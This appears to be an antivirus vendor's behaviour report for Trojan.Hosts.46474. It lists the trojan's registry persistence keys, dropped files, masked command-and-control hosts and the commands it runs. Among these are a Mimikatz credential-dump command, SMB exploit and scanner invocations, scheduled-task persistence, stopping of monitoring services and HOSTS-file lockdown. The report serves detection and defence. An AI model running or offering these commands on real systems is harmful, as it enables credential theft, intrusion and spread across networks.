Trojan.Hosts.46474

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe] 'Debugger' = '<SYSTEM32>\svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe] 'Debugger' = '<SYSTEM32>\svchost.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe] 'Debugger' = '<SYSTEM32>\svchost.exe'

Creates or modifies the following files

%WINDIR%\tasks\rvqvtncmc.job
%WINDIR%\tasks\ibnlqplvn.job

Creates the following services

[<HKLM>\System\CurrentControlSet\Services\tztncqpnk] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\tztncqpnk] 'ImagePath' = '%WINDIR%\bemlnbnq\yigmuvn.exe'
[<HKLM>\System\CurrentControlSet\Services\PolicyAgent] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\npf] 'ImagePath' = 'system32\drivers\npf.sys'
[<HKLM>\SYSTEM\CurrentControlSet\Services\NPF] 'Start' = '00000002'

Malicious functions

Executes the following

'<SYSTEM32>\net.exe' stop "Boundary Meter"
'<SYSTEM32>\net.exe' stop "TrueSight Meter"
'<SYSTEM32>\net.exe' stop npf

Modifies file system

Creates the following files

%WINDIR%\bemlnbnq\yigmuvn.exe
%WINDIR%\dvrbcnmzt\unattendgc\specials\vimpcsvc.xml
%WINDIR%\dvrbcnmzt\unattendgc\specials\spoolsrv.xml
%WINDIR%\dvrbcnmzt\unattendgc\specials\svschost.xml
%WINDIR%\dvrbcnmzt\unattendgc\schoedcl.xml
%WINDIR%\dvrbcnmzt\unattendgc\docmicfg.xml
%WINDIR%\dvrbcnmzt\unattendgc\vimpcsvc.xml
%WINDIR%\dvrbcnmzt\unattendgc\specials\docmicfg.xml
%WINDIR%\dvrbcnmzt\unattendgc\spoolsrv.xml
%WINDIR%\dvrbcnmzt\unattendgc\specials\schoedcl.exe
%WINDIR%\dvrbcnmzt\unattendgc\specials\docmicfg.exe
%WINDIR%\dvrbcnmzt\unattendgc\specials\vimpcsvc.exe
%WINDIR%\dvrbcnmzt\unattendgc\specials\spoolsrv.exe
%WINDIR%\dvrbcnmzt\unattendgc\specials\svschost.exe
%WINDIR%\dvrbcnmzt\unattendgc\specials\zlib1.dll
%WINDIR%\dvrbcnmzt\unattendgc\svschost.xml
%WINDIR%\dvrbcnmzt\corporate\vfshost.exe
%WINDIR%\dvrbcnmzt\rbisniveh\scan.bat
%WINDIR%\bemlnbnq\spoolsrv.xml
%WINDIR%\dvrbcnmzt\rbisniveh\ip.txt
%WINDIR%\dvrbcnmzt\corporate\log.txt
%WINDIR%\ime\yigmuvn.exe
%WINDIR%\temp\dtghmicrq\config.json
%WINDIR%\temp\dtghmicrq\bnvgzs.exe
%WINDIR%\dvrbcnmzt\corporate\mimilib.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\xdvl-0.dll
%WINDIR%\dvrbcnmzt\corporate\mimidrv.sys
%WINDIR%\dvrbcnmzt\unattendgc\appcapture32.dll
%WINDIR%\dvrbcnmzt\unattendgc\appcapture64.dll
%WINDIR%\dvrbcnmzt\unattendgc\shellcode.ini
%WINDIR%\bemlnbnq\schoedcl.xml
%WINDIR%\bemlnbnq\docmicfg.xml
%WINDIR%\bemlnbnq\vimpcsvc.xml
%WINDIR%\dvrbcnmzt\unattendgc\specials\schoedcl.xml
%WINDIR%\bemlnbnq\svschost.xml
%WINDIR%\dvrbcnmzt\unattendgc\specials\ucl.dll
<DRIVERS>\npf.sys
%ProgramFiles%\winpcap\rpcapd.exe
<SYSTEM32>\packet.dll
<SYSTEM32>\wpcap.dll
<SYSTEM32>\pthreadvc.dll
%WINDIR%\temp\nsx3.tmp\ns6.tmp
%WINDIR%\temp\nsx3.tmp\ns5.tmp
%ProgramFiles%\winpcap\license
%WINDIR%\temp\nsx3.tmp\ns4.tmp
%WINDIR%\temp\nsx3.tmp\system.dll
%WINDIR%\temp\nsx3.tmp\final.ini
%WINDIR%\temp\nsx3.tmp\options.ini
%WINDIR%\temp\nsn2.tmp
%WINDIR%\dvrbcnmzt\rbisniveh\wpcap.exe
%WINDIR%\temp\dvrbcnmzt\feiivviqn.exe
%WINDIR%\temp\nsx3.tmp\nsexec.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\crli-0.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\trfo-2.dll
%WINDIR%\temp\nsx3.tmp\ns7.tmp
%WINDIR%\dvrbcnmzt\unattendgc\specials\trch-1.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\tibe-2.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\ssleay32.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\posh-0.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\libxml2.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\libeay32.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\tucl-1.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\exma-1.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\coli-0.dll
%WINDIR%\dvrbcnmzt\unattendgc\specials\cnli-1.dll
%WINDIR%\dvrbcnmzt\rbisniveh\lvibqbtnv.exe
%WINDIR%\dvrbcnmzt\rbisniveh\wpcap.dll
%WINDIR%\dvrbcnmzt\rbisniveh\packet.dll
%WINDIR%\dvrbcnmzt\rbisniveh\ilnifignj.exe
%ProgramFiles%\winpcap\uninstall.exe
%WINDIR%\temp\dvrbcnmzt\1540.dmp

Sets the 'hidden' attribute to the following files

%WINDIR%\bemlnbnq\svschost.xml
%WINDIR%\bemlnbnq\spoolsrv.xml
%WINDIR%\bemlnbnq\vimpcsvc.xml
%WINDIR%\bemlnbnq\docmicfg.xml
%WINDIR%\bemlnbnq\schoedcl.xml

Deletes the following files

%WINDIR%\temp\nsx3.tmp\ns4.tmp
%WINDIR%\temp\nsx3.tmp\ns5.tmp
%WINDIR%\temp\nsx3.tmp\ns6.tmp
%WINDIR%\temp\nsx3.tmp\ns7.tmp
%WINDIR%\temp\nsx3.tmp\final.ini
%WINDIR%\temp\nsx3.tmp\nsexec.dll
%WINDIR%\temp\nsx3.tmp\options.ini
%WINDIR%\temp\nsx3.tmp\system.dll

Moves the following files

from %WINDIR%\temp\dtghmicrq\config.json to %WINDIR%\temp\1413422\...\temporaryfile
from %WINDIR%\temp\dvrbcnmzt\1540.dmp to %WINDIR%\temp\1450185\...\temporaryfile

Modifies the HOSTS file.

Moves itself

from <Full path to file> to %TEMP%\1356590\...\temporaryfile

Network activity

Connects to

'95.#11.0.2':445
'95.##1.1.133':445
'95.##1.1.134':445
'95.##1.1.135':445
'95.##1.1.138':445
'95.##1.1.137':445
'95.##1.1.141':445
'95.#11.0.10':445
'95.##1.1.140':445
'95.##1.1.142':445
'95.##1.1.144':445
'95.##1.1.143':445
'95.##1.1.145':445
'95.##1.1.148':445
'95.##1.1.147':445
'95.##1.1.115':445
'95.##1.1.132':445
'95.##1.1.114':445
'95.##1.1.113':445
'95.##1.1.112':445
'95.#11.0.3':445
'95.#11.0.4':445
'95.#11.0.5':445
'95.#11.0.6':445
'95.#11.0.7':445
'95.#11.0.8':445
'95.##1.1.146':445
'95.##1.1.139':445
'95.#11.0.9':445
'px#.#ognoob.se':35791
'95.##1.1.107':445
'95.##1.1.108':445
'95.##1.1.109':445
'95.##1.1.110':445
'95.##1.1.111':445
'95.#11.0.1':445
'95.##1.1.106':445
'95.##1.1.149':445

TCP

HTTP GET requests

http://ui#.###noob.se:63145/cfg.ini
http://20####.ip138.com/

UDP

DNS ASK ui#.#ognoob.se
DNS ASK up##.hognoob.se
DNS ASK 20####.ip138.com
DNS ASK px#.#ognoob.se

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: 'lvibqbtnv.exe'
ClassName: '' WindowName: 'ilnifignj.exe'
ClassName: '' WindowName: 'swrpwe.exe'
ClassName: '' WindowName: 'spoolsrv.exe'
ClassName: '' WindowName: 'svschost.exe'
ClassName: '' WindowName: 'scvhost.exe'
ClassName: '' WindowName: 'wmic.exe'
ClassName: '' WindowName: 'vfshost.exe'
ClassName: '' WindowName: 'vimpcsvc.exe'
ClassName: '' WindowName: 'docmicfg.exe'
ClassName: '' WindowName: 'schoedcl.exe'

Creates and executes the following

'%WINDIR%\temp\nsx3.tmp\ns5.tmp' net stop "TrueSight Meter"
'%WINDIR%\temp\nsx3.tmp\ns6.tmp' net stop npf
'%WINDIR%\dvrbcnmzt\rbisniveh\lvibqbtnv.exe' TCP 95.211.0.1 95.211.255.255 445 512 /save
'%WINDIR%\temp\dvrbcnmzt\feiivviqn.exe' -accepteula -mp 1540 %WINDIR%\TEMP\dvrbcnmzt\1540.dmp
'%WINDIR%\temp\nsx3.tmp\ns7.tmp' net start npf
'%WINDIR%\bemlnbnq\yigmuvn.exe'
'%WINDIR%\dvrbcnmzt\unattendgc\specials\svschost.exe' --NetworkTimeout 60 --TargetIp 1.1.1.1 --TargetPort 445 --OutputFile %WINDIR%\dvrbcnmzt\UnattendGC\Shellcode.ini --Protocol SMB --Architecture x64 --Funciton OutputInstall
'%WINDIR%\dvrbcnmzt\corporate\vfshost.exe' privilege::debug sekurlsa::logonpasswords exit
'%WINDIR%\dvrbcnmzt\rbisniveh\wpcap.exe' /S
'%WINDIR%\temp\dvrbcnmzt\feiivviqn.exe' -accepteula -mp 1652 %WINDIR%\TEMP\dvrbcnmzt\1652.dmp
'%WINDIR%\temp\nsx3.tmp\ns4.tmp' net stop "Boundary Meter"
'%WINDIR%\temp\dtghmicrq\bnvgzs.exe'
'<SYSTEM32>\cmd.exe' /c %WINDIR%\dvrbcnmzt\UnattendGC\specials\svschost.exe --NetworkTimeout 60 --TargetIp 1.1.1.1 --TargetPort 445 --OutputFile %WINDIR%\dvrbcnmzt\UnattendGC\Shellcode.ini --Protocol SMB --Architec...' (with hidden window)
'%WINDIR%\temp\dtghmicrq\bnvgzs.exe' ' (with hidden window)
'<SYSTEM32>\cmd.exe' /c %WINDIR%\dvrbcnmzt\rbisniveh\scan.bat' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP' (with hidden window)
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "ibnlqplvn" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\dtghmicrq\bnvgzs.exe /p everyone:F"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "rvqvtncmc" /ru system /tr "cmd /c %WINDIR%\ime\yigmuvn.exe"' (with hidden window)
'%WINDIR%\temp\dvrbcnmzt\feiivviqn.exe' -accepteula -mp 1540 %WINDIR%\TEMP\dvrbcnmzt\1540.dmp' (with hidden window)
'<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\TEMP\dtghmicrq\bnvgzs.exe /p everyone:F' (with hidden window)
'<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 5 & Start %WINDIR%\bemlnbnq\yigmuvn.exe' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP' (with hidden window)
'<SYSTEM32>\cmd.exe' /c %WINDIR%\dvrbcnmzt\rbisniveh\wpcap.exe /S' (with hidden window)
'%WINDIR%\temp\nsx3.tmp\ns7.tmp' net start npf' (with hidden window)
'%WINDIR%\temp\nsx3.tmp\ns6.tmp' net stop npf' (with hidden window)
'%WINDIR%\temp\nsx3.tmp\ns5.tmp' net stop "TrueSight Meter"' (with hidden window)
'%WINDIR%\temp\nsx3.tmp\ns4.tmp' net stop "Boundary Meter"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c %WINDIR%\dvrbcnmzt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> %WINDIR%\dvrbcnmzt\Corporate\log.txt' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add filteraction name=BastardsList action=block' (with hidden window)
'<SYSTEM32>\netsh.exe' ipsec static add policy name=Bastards description=FuckingBastards' (with hidden window)
'<SYSTEM32>\cmd.exe' /c echo Y|cacls <DRIVERS>\etc\hosts /T /D users & echo Y|cacls <DRIVERS>\etc\hosts /T /D administrators & echo Y|cacls <DRIVERS>\etc\hosts /T /D SYSTEM' (with hidden window)
'<SYSTEM32>\cmd.exe' /c net start npf' (with hidden window)
'%WINDIR%\temp\dvrbcnmzt\feiivviqn.exe' -accepteula -mp 1652 %WINDIR%\TEMP\dvrbcnmzt\1652.dmp' (with hidden window)
'<SYSTEM32>\cmd.exe' /c %WINDIR%\ime\yigmuvn.exe' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 5 & Start %WINDIR%\bemlnbnq\yigmuvn.exe
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
'<SYSTEM32>\netsh.exe' ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
'<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "ibnlqplvn" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\dtghmicrq\bnvgzs.exe /p everyone:F"
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "ibnlqplvn" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\TEMP\dtghmicrq\bnvgzs.exe /p everyone:F"
'<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "rvqvtncmc" /ru system /tr "cmd /c %WINDIR%\ime\yigmuvn.exe"
'<SYSTEM32>\cmd.exe' /c %WINDIR%\dvrbcnmzt\rbisniveh\scan.bat
'<SYSTEM32>\cmd.exe' /c echo Y|schtasks /create /sc minute /mo 1 /tn "rvqvtncmc" /ru system /tr "cmd /c %WINDIR%\ime\yigmuvn.exe"
'<SYSTEM32>\cmd.exe' /c %WINDIR%\dvrbcnmzt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> %WINDIR%\dvrbcnmzt\Corporate\log.txt
'<SYSTEM32>\cmd.exe' /c %WINDIR%\dvrbcnmzt\UnattendGC\specials\svschost.exe --NetworkTimeout 60 --TargetIp 1.1.1.1 --TargetPort 445 --OutputFile %WINDIR%\dvrbcnmzt\UnattendGC\Shellcode.ini --Protocol SMB --Architec...
'<SYSTEM32>\cmd.exe' /c net start npf
'<SYSTEM32>\net1.exe' start npf
'<SYSTEM32>\cmd.exe' /c echo Y|cacls %WINDIR%\TEMP\dtghmicrq\bnvgzs.exe /p everyone:F
'<SYSTEM32>\net.exe' start npf
'<SYSTEM32>\net1.exe' stop "TrueSight Meter"
'<SYSTEM32>\net1.exe' stop "Boundary Meter"
'<SYSTEM32>\cmd.exe' /c %WINDIR%\dvrbcnmzt\rbisniveh\wpcap.exe /S
'<SYSTEM32>\netsh.exe' ipsec static add filteraction name=BastardsList action=block
'<SYSTEM32>\netsh.exe' ipsec static add policy name=Bastards description=FuckingBastards
'<SYSTEM32>\cacls.exe' <DRIVERS>\etc\hosts /T /D SYSTEM
'<SYSTEM32>\cacls.exe' <DRIVERS>\etc\hosts /T /D administrators
'<SYSTEM32>\cacls.exe' <DRIVERS>\etc\hosts /T /D users
'<SYSTEM32>\cmd.exe' /S /D /c" echo Y"
'<SYSTEM32>\cmd.exe' /c echo Y|cacls <DRIVERS>\etc\hosts /T /D users & echo Y|cacls <DRIVERS>\etc\hosts /T /D administrators & echo Y|cacls <DRIVERS>\etc\hosts /T /D SYSTEM
'<SYSTEM32>\ping.exe' 127.0.0.1 -n 5
'<SYSTEM32>\net1.exe' stop npf
'<SYSTEM32>\cmd.exe' /c %WINDIR%\ime\yigmuvn.exe

テクノロジー

用語

トレーニングコースおよび啓蒙プロジェクト

アンチウイルスに関する誤解と噂

Technical Information

Curing recommendations

Free trial